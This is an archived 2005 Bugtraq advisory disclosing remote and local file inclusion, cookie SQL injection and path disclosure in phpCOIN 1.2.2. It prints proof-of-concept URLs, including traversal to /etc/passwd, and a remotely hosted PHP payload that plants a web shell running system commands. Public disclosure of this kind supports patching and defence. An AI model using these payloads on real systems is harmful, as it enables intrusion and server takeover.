lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20051213020818.23681.qmail@securityfocus.com>
Date: 13 Dec 2005 02:08:18 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: phpCOIN 1.2.2 multiple vulnerabilities


PhpCOIN 1.2.2 arbitrary remote\local inclusion / blind sql injection / path disclosure

software:
site: http://www.phpcoin.com/
description: "a free software package originally designed for web-hosting resellers
to handle clients, orders, invoices, notes and helpdesk, but no longer limited to
hosting resellers. phpCOIN is used by over twenty-five thousand people worldwide*,
including web-hosts, designers, lawyers, accountants, and a school band"

i) arbitrary remote/local inclusion:

vulnerable code in coin_includes/db.php at line 30-39:

...
# Determine Database and include proper class file
	switch($_DBCFG['dbms'])
	{
		case "mysql":
			require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
			break;
		default:
			require_once ($_CCFG['_PKG_PATH_DBSE'].'db_mysql.php');
			break;
	}
...


if register_globals on and allow_url_fopen on
you can include an arbitrary file from a remote location, poc:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]

on remote location you have this code in http:/[remote_location]/db_mysql.php/index.html:

<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>

then you launch commands:

http://[target]/[path]/suntzu.php?cmd=cat%20/etc/passwd

if register_globals on and magic_quotes_gpc off you can include an arbitrary file
from local resources, poc:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00
http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00

exploit tool here:
http://rgod.altervista.org/phpcoin_122_incl_xpl.html


ii) if magic_quotes_gpc off -> SQL injection through cookies:

exploit code here:
http://rgod.altervista.org/phpcoin_122_sql_xpl.html


iii) path disclosure, simply:

http://[target]/[path]/config.php

'cause in coin_includes/db.php _CCFG['_PKG_PATH_DBSE'] is not defined


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/phpcoin122.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ